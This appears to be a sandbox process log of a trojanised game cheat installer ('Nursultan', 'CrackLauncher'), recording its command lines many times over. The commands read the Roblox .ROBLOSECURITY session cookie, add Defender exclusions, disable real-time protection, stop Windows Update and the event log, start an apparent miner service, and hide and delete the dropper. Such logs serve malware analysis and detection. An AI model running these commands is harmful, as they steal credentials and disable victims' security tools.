"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "XMRKNZQC"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "XMRKNZQC"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\sc.exe

"C:\Windows\system32\sc.exe" qc windefend

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"

C:\Windows\SysWOW64\whoami.exe

"C:\Windows\system32\whoami.exe" /groups

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
